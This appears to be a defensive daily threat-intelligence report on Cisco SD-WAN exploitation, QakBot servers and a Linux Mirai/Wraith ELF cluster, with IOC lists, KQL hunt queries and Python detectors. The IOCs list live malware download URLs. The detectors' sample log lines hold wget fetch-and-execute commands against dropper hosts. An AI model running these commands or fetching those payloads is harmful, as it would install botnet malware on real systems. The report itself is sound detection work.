May 16, 2026

Daily Threat Intelligence Report - 2026-05-14

28 IOCs | 12 TTPs | 9 KQL Queries
Executive Summary

Today's threat landscape is dominated by three converging threats: active QakBot and Emotet C2 infrastructure confirmed by Feodotracker across US, UK, and Japanese hosting providers; active exploitation of CVE-2026-20182 (Cisco Catalyst SD-WAN authentication bypass) tracked by AlienVault OTX and CISA KEV with 33 confirmed IOCs attributed to threat actor UAT-8616; and a surge in Linux ELF malware distribution including Mirai botnet samples and Wraith-tagged payloads observed across MalwareBazaar and URLhaus malware download infrastructure. Immediate actions required: block all five Feodotracker C2 IPs at perimeter, apply Cisco SD-WAN patches per CISA Emergency Directive 26-03, and hunt for UPX-packed ELF executions on Linux endpoints. Additionally, CISA KEV lists four other critical vulnerabilities including Palo Alto PAN-OS RCE (CVE-2026-0300), Ivanti EPMM RCE (CVE-2026-6973), Microsoft Exchange XSS (CVE-2026-42897), and BerriAI LiteLLM SQLi (CVE-2026-42208) requiring immediate patching.

#1

Active Exploitation of Cisco Catalyst SD-WAN Authentication Bypass (CVE-2026-20182) by UAT-8616

Severity: CRITICAL | Threat actor: UAT-8616

Threat actor UAT-8616 is actively exploiting CVE-2026-20182, a critical authentication bypass vulnerability in Cisco Catalyst SD-WAN Controller and Manager, enabling unauthenticated remote attackers to obtain full administrative privileges. This campaign is confirmed by AlienVault OTX with 33 associated IOCs and corroborated by CISA's Known Exploited Vulnerabilities catalogue with an active Emergency Directive (ED 26-03). Successful exploitation grants attackers complete control over SD-WAN fabric, enabling network traffic manipulation, lateral movement, persistent backdoor installation, and potential supply-chain-style pivoting into connected enterprise networks. CISA mandates immediate remediation per ED 26-03 and has published specific Hunt and Hardening Guidance for Cisco SD-WAN devices; organizations unable to patch immediately must assess exposure and consider isolation of affected controllers.

Indicators of Compromise
CVE CVE-2026-20182 Authentication bypass in Cisco Catalyst SD-WAN Controller and Manager; actively exploited by UAT-8616; grants unauthenticated remote attackers administrative privileges
URL https://backyard-harvest-planner.garden/429e5532-8c10-4da4-9aee-c2eec2d23872/google.cl Active malware download URL; URLhaus confirmed malware_download; possibly used for post-exploitation payload staging (the link to this campaign is inferred, not confirmed)
URL https://evergreentimberland.garden/aa85d475-72f2-4c64-9cab-57a7c8a4d3be/google.cl Active malware download URL; URLhaus confirmed malware_download; garden-themed domain used for payload delivery or C2, same attribution caveat
HASH cf3d2fc280979eca3e83eb37e9eaacaa9029b83e315840ba89892a0a08ebd1e9 Mirai ELF malware sample; UPX-packed; MalwareBazaar confirmed; listed here as a possible post-exploitation payload on network devices (see #3 for the full ELF cluster)
MITRE ATT&CK TTPs
T1190 Exploit Public-Facing Application
T1098 Account Manipulation
T1071.001 Application Layer Protocol: Web Protocols
T1562.001 Impair Defenses: Disable or Modify Tools
Hunt Queries
SENTINEL Hunt for Suspicious Connections to Malware Download Infrastructure Associated with SD-WAN Exploitation

Detects outbound connections from network devices or servers to the two URLhaus-confirmed malware download domains that this report associates with post-exploitation payload staging. RequestURL is only populated where the proxy or firewall logs full URLs; for TLS traffic without inspection, the DestinationHostName (SNI) match is the one that will fire, so keep both conditions.

CommonSecurityLog
| where TimeGenerated > ago(24h)
| where RequestURL has_any ('backyard-harvest-planner.garden', 'evergreentimberland.garden')
    or DestinationHostName has_any ('backyard-harvest-planner.garden', 'evergreentimberland.garden')
| project TimeGenerated, SourceIP, DestinationIP, DestinationHostName, RequestURL, Activity, DeviceVendor
| order by TimeGenerated desc
MDE Detect UPX-Packed Mirai ELF Execution: Post-Exploitation Payload

Hunts for file creation or process execution events matching the Mirai ELF sample confirmed by MalwareBazaar (cf3d2fc280979eca3e83eb37e9eaacaa9029b83e315840ba89892a0a08ebd1e9) that could indicate a post-exploitation payload dropped after Cisco SD-WAN compromise. DeviceFileEvents only records file writes, so DeviceProcessEvents is unioned in to catch actual execution.

union DeviceFileEvents, DeviceProcessEvents
| where TimeGenerated > ago(24h)
| where SHA256 == 'cf3d2fc280979eca3e83eb37e9eaacaa9029b83e315840ba89892a0a08ebd1e9'
| project TimeGenerated, Type, DeviceName, ActionType, FileName, FolderPath, SHA256, InitiatingProcessFileName, InitiatingProcessCommandLine
| order by TimeGenerated desc
SENTINEL Cisco SD-WAN Admin Authentication Anomaly Detection

Identifies administrative authentication activity on Cisco SD-WAN infrastructure that may indicate exploitation of CVE-2026-20182: bursts of admin, login or privilege events from source IPs outside the approved management ranges. Replace the placeholder in ApprovedMgmtRanges with your own out-of-band management networks; without that exclusion the query degrades to a plain volume threshold. Whether vManage/vBond/vSmart events land in CommonSecurityLog or in Syslog depends on how the logging is collected, so switch the table if your connector is plain syslog.

// Replace with your approved out-of-band management ranges (placeholder value)
let ApprovedMgmtRanges = dynamic(['10.255.0.0/24']);
CommonSecurityLog
| where TimeGenerated > ago(24h)
| where DeviceVendor == 'Cisco'
| where Activity has_any ('admin', 'authentication', 'login', 'privilege')
| where Message has_any ('SD-WAN', 'vManage', 'vBond', 'vSmart')
| where not(ipv4_is_in_any_range(SourceIP, ApprovedMgmtRanges))
| summarize AuthCount=count() by SourceIP, DestinationIP, Activity, bin(TimeGenerated, 1h)
| where AuthCount > 3
| order by AuthCount desc
Recommended Actions
→ IMMEDIATE: Apply Cisco patches per CISA Emergency Directive 26-03; prioritize SD-WAN Controller and Manager instances exposed on internet-facing interfaces
→ IMMEDIATE: Follow CISA Hunt and Hardening Guidance for Cisco SD-WAN Devices to identify signs of prior compromise before patching
→ IMMEDIATE: Block outbound connections to backyard-harvest-planner.garden and evergreentimberland.garden at proxy and DNS filtering layers
→ IMMEDIATE: Audit all administrative accounts on SD-WAN Controllers for unauthorized additions or modifications in the past 30 days
→ SHORT-TERM: Deploy the Sentinel KQL query to identify anomalous admin authentication events across Cisco SD-WAN infrastructure
→ SHORT-TERM: Implement out-of-band log shipping from all SD-WAN components to a SIEM to preserve tamper-evident audit trails
→ SHORT-TERM: Scan all Linux endpoints for Mirai ELF sample SHA256 cf3d2fc280979eca3e83eb37e9eaacaa9029b83e315840ba89892a0a08ebd1e9 using EDR
→ LONG-TERM: Enforce network segmentation isolating the SD-WAN management plane from general corporate network access
→ LONG-TERM: Integrate AlienVault OTX pulse IOCs (33 indicators) for the UAT-8616 campaign into SIEM and firewall block lists
#2

QakBot Banking Trojan C2 Infrastructure Active Across Three Countries: Imminent Financial Sector Risk

Severity: HIGH | Threat actor: TA505

Feodotracker has confirmed four active QakBot command-and-control servers across three countries: US (50.16.16.211, 34.204.119.63), UK (178.62.3.223), and Japan (27.133.154.218), indicating a geographically distributed and resilient C2 architecture actively supporting live QakBot infections. QakBot (also known as QBot or Pinkslipbot) is a banking trojan and loader known for credential theft, lateral movement, and serving as a precursor for ransomware deployments including Black Basta and Conti. It is tracked here under TA505, but QakBot distribution has been attributed to several affiliate groups over the years, so the actor tag should be treated as provisional rather than as firm attribution. The multi-country hosting pattern is consistent with documented use of compromised or rented hosting infrastructure to evade geo-based blocking and maintain operational continuity when individual nodes are taken down. Organizations with active infections may be at imminent risk of credential exfiltration and ransomware pre-positioning; immediate blocking and retroactive hunting across 90 days of network logs is strongly advised.

Indicators of Compromise
IP 50.16.16.211 QakBot C2 server; US-hosted; Feodotracker confirmed active
IP 34.204.119.63 QakBot C2 server; US-hosted; Feodotracker confirmed active
IP 178.62.3.223 QakBot C2 server; UK-hosted; Feodotracker confirmed active
IP 27.133.154.218 QakBot C2 server; Japan-hosted; Feodotracker confirmed active
URL https://wavellen.github.io/Microsoft-Clone-Home-Page Microsoft credential phishing page; OpenPhish confirmed; same-period phishing infrastructure relevant to initial access, not confirmed QakBot delivery
HASH b5962bbac90bfc8f48ca89d5f0137e91de6030c2fcd4bd34491d6e84b77a3924 BAT file malware sample; MalwareBazaar confirmed; consistent with the batch-script droppers used for QakBot delivery (family link is inferred)
MITRE ATT&CK TTPs
T1566.001 Phishing: Spearphishing Attachment
T1071.001 Application Layer Protocol: Web Protocols
T1555.003 Credentials from Password Stores: Credentials from Web Browsers
T1021.002 Remote Services: SMB/Windows Admin Shares
Hunt Queries
MDE Hunt for Active Connections to QakBot C2 Infrastructure

Detects any outbound connections to the four confirmed active QakBot C2 servers identified by Feodotracker. Any match indicates active QakBot infection requiring immediate incident response. The 90-day window assumes Sentinel retention of at least that length; native Defender advanced hunting keeps 30 days, so confirm the retention of the table you are querying before treating an empty result as a clean bill.

DeviceNetworkEvents
| where TimeGenerated > ago(90d)
| where RemoteIP in ('50.16.16.211', '34.204.119.63', '178.62.3.223', '27.133.154.218')
| project TimeGenerated, DeviceName, RemoteIP, RemotePort, LocalIP, LocalPort, ActionType, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessAccountName
| order by TimeGenerated desc
MDE Detect BAT File Dropper Execution: QakBot Stager

Hunts for the MalwareBazaar-confirmed BAT sample associated with QakBot delivery (b5962bbac90bfc8f48ca89d5f0137e91de6030c2fcd4bd34491d6e84b77a3924) and for .bat files written by Office applications or script hosts, a pattern consistent with batch-script dropper activity.

DeviceFileEvents
| where TimeGenerated > ago(24h)
| where SHA256 == 'b5962bbac90bfc8f48ca89d5f0137e91de6030c2fcd4bd34491d6e84b77a3924'
    or (FileName endswith '.bat' and InitiatingProcessFileName in~ ('outlook.exe', 'winword.exe', 'excel.exe', 'powerpnt.exe', 'mshta.exe', 'wscript.exe'))
| project TimeGenerated, DeviceName, FileName, FolderPath, SHA256, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessAccountName
| order by TimeGenerated desc
MDI Detect Lateral Movement via SMB After QakBot Credential Theft

Identifies NTLM network logon patterns consistent with lateral movement using harvested credentials: one account from one source IP authenticating to many distinct destinations, or at high volume, within an hour. The thresholds (more than 5 logons or more than 3 distinct destinations per hour) are deliberately low starting points and will fire on backup, monitoring and administrative accounts; baseline and exclude those before alerting on this query.

IdentityLogonEvents
| where TimeGenerated > ago(24h)
| where ActionType == 'LogonSuccess'
| where Protocol == 'Ntlm'
| where LogonType in ('Network', 'NetworkCleartext')
| summarize LogonCount=count(), DistinctDestinations=dcount(DeviceName) by AccountDisplayName, IPAddress, bin(TimeGenerated, 1h)
| where LogonCount > 5 or DistinctDestinations > 3
| order by DistinctDestinations desc
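The fan-out logic of the MDI hunt, run over a handful of constructed logon events, as an added example. This code is not from the report or from any Microsoft tool; SAMPLE_EVENTS is made-up test data whose columns mirror IdentityLogonEvents, and nothing here queries Defender.

```python
"""NTLM fan-out detection: the logic behind the MDI hunt, in Python.

Added example, not part of the original report. Buckets successful NTLM
network logons by (account, source IP, hour) and flags buckets that exceed
either the logon-count or the distinct-destination threshold used in the KQL.
SAMPLE_EVENTS is constructed test data, not real telemetry.
"""
from collections import defaultdict
from datetime import datetime

LOGON_THRESHOLD = 5   # flag if more than this many logons in an hour
DEST_THRESHOLD = 3    # flag if more than this many distinct destinations in an hour

# Constructed sample events:
# (timestamp, account, source_ip, destination_host, protocol, logon_type, action)
SAMPLE_EVENTS = [
    ("2026-05-14T09:02:11Z", "CORP\\jdoe",   "10.20.5.17", "FS01",   "Ntlm",     "Network", "LogonSuccess"),
    ("2026-05-14T09:04:40Z", "CORP\\jdoe",   "10.20.5.17", "WS-104", "Ntlm",     "Network", "LogonSuccess"),
    ("2026-05-14T09:05:02Z", "CORP\\jdoe",   "10.20.5.17", "WS-117", "Ntlm",     "Network", "LogonSuccess"),
    ("2026-05-14T09:05:55Z", "CORP\\jdoe",   "10.20.5.17", "WS-121", "Ntlm",     "Network", "LogonSuccess"),
    ("2026-05-14T09:07:13Z", "CORP\\jdoe",   "10.20.5.17", "SQL02",  "Ntlm",     "Network", "LogonSuccess"),
    ("2026-05-14T09:08:30Z", "CORP\\jdoe",   "10.20.5.17", "SQL02",  "Ntlm",     "Network", "LogonFailed"),   # failures ignored
    ("2026-05-14T09:10:00Z", "CORP\\svc_bk", "10.20.9.9",  "FS01",   "Kerberos", "Network", "LogonSuccess"),  # not NTLM
    ("2026-05-14T09:11:00Z", "CORP\\asmith", "10.20.5.40", "FS01",   "Ntlm",     "Network", "LogonSuccess"),
    ("2026-05-14T09:12:00Z", "CORP\\asmith", "10.20.5.40", "FS01",   "Ntlm",     "Network", "LogonSuccess"),
    ("2026-05-14T10:30:00Z", "CORP\\jdoe",   "10.20.5.17", "FS01",   "Ntlm",     "Network", "LogonSuccess"),  # next hour
]


def hour_bucket(ts: str) -> str:
    """Truncate an ISO-8601 UTC timestamp to the hour, like bin(TimeGenerated, 1h)."""
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").strftime("%Y-%m-%dT%H:00Z")


def find_fanout(events, logon_threshold=LOGON_THRESHOLD, dest_threshold=DEST_THRESHOLD):
    """Return flagged (account, ip, hour) buckets, most distinct destinations first."""
    logons = defaultdict(int)
    destinations = defaultdict(set)
    for ts, account, ip, dest, protocol, logon_type, action in events:
        # Same filters as the KQL: successful NTLM network-style logons only.
        if action != "LogonSuccess" or protocol != "Ntlm":
            continue
        if logon_type not in ("Network", "NetworkCleartext"):
            continue
        key = (account, ip, hour_bucket(ts))
        logons[key] += 1
        destinations[key].add(dest)

    hits = []
    for (account, ip, hour), count in logons.items():
        distinct = len(destinations[(account, ip, hour)])
        if count > logon_threshold or distinct > dest_threshold:
            hits.append({"account": account, "ip": ip, "hour": hour,
                         "logons": count, "distinct_destinations": distinct})
    hits.sort(key=lambda h: h["distinct_destinations"], reverse=True)
    return hits


if __name__ == "__main__":
    for hit in find_fanout(SAMPLE_EVENTS):
        print(hit)
```

CORP\jdoe is caught by the distinct-destination rule, not the count rule: five successful logons do not exceed the threshold of 5, but five distinct hosts in one hour do. That is why the KQL keeps both conditions; drop either one and this pattern slips through.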
Recommended Actions
→ IMMEDIATE: Block all four QakBot C2 IPs (50.16.16.211, 34.204.119.63, 178.62.3.223, 27.133.154.218) at perimeter firewall, web proxy, and DNS sinkholes
→ IMMEDIATE: Run the MDE C2 connection hunt query across a 90-day lookback; any hit is a confirmed active infection requiring IR escalation
→ IMMEDIATE: Block the Microsoft-clone phishing URL https://wavellen.github.io/Microsoft-Clone-Home-Page at web proxy and email security gateway
→ IMMEDIATE: Submit BAT dropper hash b5962bbac90bfc8f48ca89d5f0137e91de6030c2fcd4bd34491d6e84b77a3924 to the EDR platform for immediate blocking across all endpoints
→ SHORT-TERM: Execute the MDI lateral movement detection query and investigate all accounts with more than 5 NTLM logons or more than 3 distinct destinations in a 1-hour window
→ SHORT-TERM: Force password resets for any accounts identified on endpoints with suspected QakBot infections
→ SHORT-TERM: Enable MFA on all user accounts, prioritizing privileged and service accounts, to limit the impact of harvested credentials
→ LONG-TERM: Implement SMB firewall rules blocking workstation-to-workstation SMB to limit QakBot lateral movement capability
→ LONG-TERM: Update the Feodotracker feed integration to automatically block newly listed QakBot C2 IPs within 1 hour of publication
#3

Coordinated Linux ELF Botnet Recruitment Campaign: Mirai, Wraith, and UPX-Packed Malware Surge via Malware Download Infrastructure

Severity: MEDIUM | Threat actor: Unknown

MalwareBazaar has identified a cluster of nine Linux ELF binaries submitted within the last 24 hours, the majority UPX-packed: one confirmed Mirai botnet sample (cf3d2fc280979eca3e83eb37e9eaacaa9029b83e315840ba89892a0a08ebd1e9), three samples tagged with the 'wraith' stealer designation, and five not yet attributed to a family. These are being distributed via URLhaus-confirmed malware download infrastructure using non-standard high-numbered TCP ports (33129, 48114, 48707, 54809, 32782, 35600) across IP addresses geolocated to China, Pakistan, and Australia, consistent with compromised IoT and home router infrastructure used as distribution nodes. The Wraith-tagged ELF samples (5e9747bbc50448329ec19615861b53c11398ccd171c4c7e5c227e0c1d73fb219, e98b8422076992dd1ee7a6ee4a7ca71b08004d8a80104186ad01490d5eba7e45, aef8c86b9a3d3d4392641868a17670c82ae136fdc9767277fbf81fdbeb566ac8) point to a possible Go-based stealer component alongside the botnet recruitment activity, suggesting a dual-purpose campaign targeting both Linux server compromise and credential theft. In the same period, GitHub/stamparm maltrail updated its ClearFake and OSX Atomic tracking files; those are separate families on other platforms and no link to this ELF cluster is evidenced, so they are noted for awareness rather than attributed to this campaign.

Indicators of Compromise
HASH cf3d2fc280979eca3e83eb37e9eaacaa9029b83e315840ba89892a0a08ebd1e9 Confirmed Mirai botnet ELF binary; UPX-packed; MalwareBazaar confirmed
HASH 5e9747bbc50448329ec19615861b53c11398ccd171c4c7e5c227e0c1d73fb219 Wraith stealer ELF binary; MalwareBazaar confirmed; potential credential theft component
HASH e98b8422076992dd1ee7a6ee4a7ca71b08004d8a80104186ad01490d5eba7e45 Wraith stealer ELF binary; UPX-packed; MalwareBazaar confirmed
HASH aef8c86b9a3d3d4392641868a17670c82ae136fdc9767277fbf81fdbeb566ac8 Wraith stealer ELF binary; UPX-packed; MalwareBazaar confirmed
HASH 8fef5d340cdaaf4c28d1c3a3a962fc1b5c9cbdbc42a2147c694ebf0ef6b1f860 UPX-packed ELF binary; MalwareBazaar confirmed; unclassified family
HASH 4465fe927fb161af41e689f68ff6019db07859906ed639515c0bc351046d7033 UPX-packed ELF binary; MalwareBazaar confirmed; unclassified family
HASH cfbc1c3699c99c4cb6f11d1aead29dd7b6eba440a88a4142505eede3e5430fff UPX-packed ELF binary; MalwareBazaar confirmed; unclassified family
HASH 060442f18212e1148afc9c7514d90384973956c0c246d5562c7f4da1473a7bd9 UPX-packed ELF binary; MalwareBazaar confirmed; unclassified family
HASH 4dfa9563f4889e22f0d279b83b33205394960560fa010048cf0424bbfbb26adb UPX-packed ELF binary; MalwareBazaar confirmed; unclassified family
URL http://110.36.30.112:33129/i Active malware download URL serving ELF payloads; URLhaus confirmed malware_download; non-standard port 33129
URL http://123.5.124.220:48114/bin.sh Active malware download URL serving shell script; URLhaus confirmed malware_download; non-standard port 48114
URL http://221.215.249.36:48707/i Active malware download URL serving ELF payload; URLhaus confirmed malware_download; non-standard port 48707
URL http://115.57.194.83:54809/i Active malware download URL serving ELF payload; URLhaus confirmed malware_download; non-standard port 54809
URL http://115.57.194.83:54809/bin.sh Active malware download URL serving shell script; URLhaus confirmed malware_download; same host, dual delivery
URL http://182.176.116.4:32782/bin.sh Active malware download URL serving shell script; URLhaus confirmed malware_download; non-standard port 32782
URL http://222.140.189.209:35600/i Active malware download URL serving ELF payload; URLhaus confirmed malware_download; non-standard port 35600
URL http://222.140.189.209:35600/bin.sh Active malware download URL serving shell script; URLhaus confirmed malware_download; same host, dual delivery
IP 162.243.103.246 Emotet C2 server; US-hosted; Feodotracker confirmed active; contextually relevant to the broader botnet ecosystem
MITRE ATT&CK TTPs
T1105 Ingress Tool Transfer
T1027.002 Obfuscated Files or Information: Software Packing
T1498.001 Network Denial of Service: Direct Network Flood
T1552.004 Unsecured Credentials: Private Keys
Hunt Queries
MDE Detect Execution of Known Malicious ELF Hashes: Mirai and Wraith Cluster

Hunts for file creation or process execution events matching all nine MalwareBazaar-confirmed ELF hashes from today's reporting period, including the Mirai sample and the three Wraith-tagged stealer binaries. DeviceProcessEvents is unioned in because DeviceFileEvents only records file writes, not execution.

union DeviceFileEvents, DeviceProcessEvents
| where TimeGenerated > ago(24h)
| where SHA256 in (
    'cf3d2fc280979eca3e83eb37e9eaacaa9029b83e315840ba89892a0a08ebd1e9',
    '5e9747bbc50448329ec19615861b53c11398ccd171c4c7e5c227e0c1d73fb219',
    'e98b8422076992dd1ee7a6ee4a7ca71b08004d8a80104186ad01490d5eba7e45',
    'aef8c86b9a3d3d4392641868a17670c82ae136fdc9767277fbf81fdbeb566ac8',
    '8fef5d340cdaaf4c28d1c3a3a962fc1b5c9cbdbc42a2147c694ebf0ef6b1f860',
    '4465fe927fb161af41e689f68ff6019db07859906ed639515c0bc351046d7033',
    'cfbc1c3699c99c4cb6f11d1aead29dd7b6eba440a88a4142505eede3e5430fff',
    '060442f18212e1148afc9c7514d90384973956c0c246d5562c7f4da1473a7bd9',
    '4dfa9563f4889e22f0d279b83b33205394960560fa010048cf0424bbfbb26adb'
)
| project TimeGenerated, Type, DeviceName, FileName, FolderPath, SHA256, ActionType, InitiatingProcessFileName, InitiatingProcessCommandLine
| order by TimeGenerated desc
MDE Detect ELF Malware Download via Non-Standard High Ports: URLhaus Infrastructure

Identifies outbound connections to the six URLhaus-confirmed distribution IPs and, more broadly, successful connections to public IPs on the six observed high ports. The port-only branch is a weak signal on its own (ephemeral and peer-to-peer traffic use the same range), so it is restricted to public destinations; treat port-only hits as leads to pivot on, not as confirmed infections.

DeviceNetworkEvents
| where TimeGenerated > ago(24h)
| where RemoteIP in ('110.36.30.112', '123.5.124.220', '221.215.249.36', '115.57.194.83', '182.176.116.4', '222.140.189.209')
    or (RemotePort in (33129, 48114, 48707, 54809, 32782, 35600) and ActionType == 'ConnectionSuccess' and RemoteIPType == 'Public')
| project TimeGenerated, DeviceName, RemoteIP, RemotePort, RemoteIPType, LocalIP, ActionType, InitiatingProcessFileName, InitiatingProcessCommandLine
| order by TimeGenerated desc
SENTINEL Detect Shell Script and ELF Download Patterns on Linux Infrastructure

Identifies wget or curl commands fetching from the confirmed distribution IPs, from any host on the observed high ports, or any fetch whose path is the bare /i or /bin.sh stager name seen across the URLhaus infrastructure. The port match is anchored to a URL so that unrelated numbers in the message (PIDs, byte counts, SSH source ports) do not match. Command lines only reach Syslog if execve auditing or shell command logging is forwarded from the hosts, so confirm that coverage exists before relying on this query.

Syslog
| where TimeGenerated > ago(24h)
| where SyslogMessage has_any ('wget', 'curl')
| where SyslogMessage matches regex @'https?://[^\s/]+:(33129|48114|48707|54809|32782|35600)/'
    or SyslogMessage has_any ('110.36.30.112', '123.5.124.220', '221.215.249.36', '115.57.194.83', '182.176.116.4', '222.140.189.209')
    or SyslogMessage matches regex @'https?://[^\s]+/(i|bin\.sh)(\s|$|[;&|])'
| project TimeGenerated, Computer, HostName, SyslogMessage, ProcessName
| order by TimeGenerated desc
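The Syslog hunt above relies on substring and regex matches. The added example below, which is not from the report, generalises it into a small URL classifier run over constructed command-log lines. The six distribution IPs come from this report; 203.0.113.9, the hostnames, PIDs and timestamps are made up, and the port list and path-length cut-off are assumptions to tune.

```python
"""Dropper-fetch detection over shell/command logs.

Added example, not part of the original report. Extracts URLs from wget/curl
commands and scores each on three signals seen in the URLhaus cluster:
a known distribution IP, a raw IP on a non-standard port, and a short stager
path such as /i or /bin.sh. SAMPLE_LINES are constructed log lines, not real
telemetry; 203.0.113.9 is a documentation address standing in for an unknown host.
"""
import re
from ipaddress import ip_address
from urllib.parse import urlsplit

# Distribution IPs from the URLhaus entries in this report.
KNOWN_DROPPER_HOSTS = {
    "110.36.30.112", "123.5.124.220", "221.215.249.36",
    "115.57.194.83", "182.176.116.4", "222.140.189.209",
}
COMMON_HTTP_PORTS = {80, 443, 8080, 8443}   # assumption: treat anything else as non-standard
FETCH_RE = re.compile(r"\b(wget|curl)\b")
URL_RE = re.compile(r"https?://[^\s'\"|;&]+")

SAMPLE_LINES = [
    "May 14 03:12:07 web01 bash[2210]: cd /tmp; wget http://115.57.194.83:54809/bin.sh; chmod +x bin.sh; ./bin.sh",
    "May 14 03:12:09 web01 bash[2210]: curl -O http://222.140.189.209:35600/i",
    "May 14 03:15:00 build02 sh[887]: curl -fsSL https://deb.nodesource.com/setup_20.x",
    "May 14 03:16:42 iot-gw bash[12]: busybox wget http://203.0.113.9:60123/x86 -O /var/tmp/.x",
    "May 14 03:17:00 web01 sshd[2301]: Accepted publickey for deploy from 10.1.2.3 port 54809 ssh2",
]


def classify_url(url: str) -> list:
    """Return the list of suspicious signals for a fetched URL (empty if none)."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    port = parts.port
    reasons = []
    if host in KNOWN_DROPPER_HOSTS:
        reasons.append("known URLhaus dropper host")
    try:
        ip_address(host)
        raw_ip = True
    except ValueError:
        raw_ip = False
    if raw_ip and port is not None and port not in COMMON_HTTP_PORTS:
        reasons.append(f"raw IP on non-standard port {port}")
    path = parts.path.rstrip("/")
    # Mirai-style stagers use tiny names: /i, /bin.sh, /x86, /arm7 and the like.
    if path and len(path) <= 8:
        reasons.append(f"short stager path {path!r}")
    return reasons


def scan_lines(lines):
    """Flag fetch commands that hit a known host or stack at least two signals."""
    findings = []
    for line in lines:
        if not FETCH_RE.search(line):
            continue
        for url in URL_RE.findall(line):
            reasons = classify_url(url)
            if "known URLhaus dropper host" in reasons or len(reasons) >= 2:
                findings.append({"url": url, "reasons": reasons, "line": line})
    return findings


if __name__ == "__main__":
    for f in scan_lines(SAMPLE_LINES):
        print(f["url"], "->", "; ".join(f["reasons"]))
```

A single short path is not enough to flag on its own (every REST API has a /api), so a fetch is reported only when it hits a known host or stacks two signals, for example a raw IP on an unusual port plus a stager-style filename. That catches the unknown 203.0.113.9 host in the sample as well as the listed ones, while the sshd line with "port 54809" in it is never considered because it is not a fetch command.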
Recommended Actions
→ IMMEDIATE: Block all six URLhaus distribution IPs (110.36.30.112, 123.5.124.220, 221.215.249.36, 115.57.194.83, 182.176.116.4, 222.140.189.209), which serve the eight malware download URLs above, at perimeter firewall and Linux host-based firewalls
→ IMMEDIATE: Submit all nine ELF hashes to the EDR platform and antivirus for immediate detection and blocking across Linux endpoints
→ IMMEDIATE: Implement egress firewall rules blocking outbound HTTP/HTTPS on non-standard ports above 30000 from server and IoT network segments, after baselining for legitimate applications that use those ports
→ SHORT-TERM: Execute the MDE hash hunt query across all Linux endpoints and investigate any matches as active compromises requiring immediate IR
→ SHORT-TERM: Audit all Linux servers and IoT devices for default credentials; rotate SSH keys and disable default accounts on all internet-facing Linux infrastructure
→ SHORT-TERM: Deploy YARA rules detecting UPX-packed ELF binaries executing from /tmp, /var/tmp, or world-writable directories
→ SHORT-TERM: Review GitHub/stamparm/maltrail ClearFake and OSX Atomic signature updates and deploy the updated detection rules to network traffic analysis platforms
→ LONG-TERM: Implement network segmentation isolating IoT devices from server infrastructure to limit lateral movement of Mirai-family botnets
→ LONG-TERM: Deploy file integrity monitoring (FIM) on all Linux servers covering /tmp, /var/tmp, and system binary directories for unauthorized ELF execution
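The YARA and FIM recommendations above can be approximated on a host without either tool. The added example below is not from the report or from any product: it walks the usual staging directories, checks for the ELF magic and the UPX! marker, and matches the nine hashes from this report. FAKE_UPX_ELF is constructed test data containing only the header bytes and markers, and demo_scan() writes it to a temporary directory so the scanner can be exercised without a real sample.

```python
"""Scan staging directories for UPX-packed ELF binaries and known-bad hashes.

Added example, not part of the original report. Reads files from world-writable
staging directories, checks the ELF magic, looks for the 'UPX!' marker that stock
UPX leaves in the loader stub and trailer, and compares the SHA256 against the
nine hashes in this report. FAKE_UPX_ELF is a constructed byte string with the
header and markers only; it is not a real binary and will not execute.
"""
import hashlib
import os
import stat
import tempfile

ELF_MAGIC = b"\x7fELF"
UPX_MARKER = b"UPX!"
SCAN_DIRS = ("/tmp", "/var/tmp", "/dev/shm")

# SHA256 hashes of the ELF cluster listed in this report.
KNOWN_BAD_SHA256 = {
    "cf3d2fc280979eca3e83eb37e9eaacaa9029b83e315840ba89892a0a08ebd1e9",
    "5e9747bbc50448329ec19615861b53c11398ccd171c4c7e5c227e0c1d73fb219",
    "e98b8422076992dd1ee7a6ee4a7ca71b08004d8a80104186ad01490d5eba7e45",
    "aef8c86b9a3d3d4392641868a17670c82ae136fdc9767277fbf81fdbeb566ac8",
    "8fef5d340cdaaf4c28d1c3a3a962fc1b5c9cbdbc42a2147c694ebf0ef6b1f860",
    "4465fe927fb161af41e689f68ff6019db07859906ed639515c0bc351046d7033",
    "cfbc1c3699c99c4cb6f11d1aead29dd7b6eba440a88a4142505eede3e5430fff",
    "060442f18212e1148afc9c7514d90384973956c0c246d5562c7f4da1473a7bd9",
    "4dfa9563f4889e22f0d279b83b33205394960560fa010048cf0424bbfbb26adb",
}

# Constructed stand-in: ELF magic, ELFCLASS64, then UPX markers where stock UPX puts them.
FAKE_UPX_ELF = ELF_MAGIC + b"\x02\x01\x01" + b"\x00" * 57 + UPX_MARKER + b"\x00" * 200 + UPX_MARKER + b"\x00" * 32


def inspect_bytes(data: bytes) -> dict:
    """Classify file contents: ELF or not, UPX marker present, known-bad hash."""
    info = {
        "is_elf": data[:4] == ELF_MAGIC,
        "upx": False,
        "sha256": hashlib.sha256(data).hexdigest(),
    }
    info["known_bad"] = info["sha256"] in KNOWN_BAD_SHA256
    if info["is_elf"]:
        info["elf_class"] = 64 if data[4:5] == b"\x02" else 32
        # Stock UPX writes 'UPX!' into the loader stub near the start and into the
        # pack header at the tail. Attackers sometimes scrub it, so absence is not proof.
        info["upx"] = UPX_MARKER in data[:1024] or UPX_MARKER in data[-64:]
    return info


def scan_dirs(dirs=SCAN_DIRS, max_size=50 * 1024 * 1024) -> list:
    """Return ELF files under the given directories that are UPX-packed, known-bad, or executable."""
    hits = []
    for d in dirs:
        if not os.path.isdir(d):
            continue
        for root, _, files in os.walk(d):
            for name in files:
                path = os.path.join(root, name)
                try:
                    st = os.lstat(path)          # lstat: do not follow symlinks out of the dir
                    if not stat.S_ISREG(st.st_mode) or st.st_size > max_size:
                        continue
                    with open(path, "rb") as fh:
                        data = fh.read()
                except OSError:
                    continue
                info = inspect_bytes(data)
                if not info["is_elf"]:
                    continue
                info["executable"] = bool(st.st_mode & 0o111)
                if info["upx"] or info["known_bad"] or info["executable"]:
                    info["path"] = path
                    hits.append(info)
    return hits


def demo_scan() -> list:
    """Write the constructed sample plus a benign script into a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        with open(os.path.join(tmp, ".x"), "wb") as fh:
            fh.write(FAKE_UPX_ELF)
        with open(os.path.join(tmp, "setup.sh"), "wb") as fh:
            fh.write(b"#!/bin/sh\necho hello\n")
        return scan_dirs([tmp])


if __name__ == "__main__":
    for hit in scan_dirs():
        print(hit["path"], "upx" if hit["upx"] else "", "KNOWN-BAD" if hit["known_bad"] else "")
```

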